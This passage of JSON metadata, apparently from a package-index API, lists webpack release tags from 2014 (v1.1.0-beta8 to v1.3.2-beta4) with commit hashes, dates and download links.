ha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests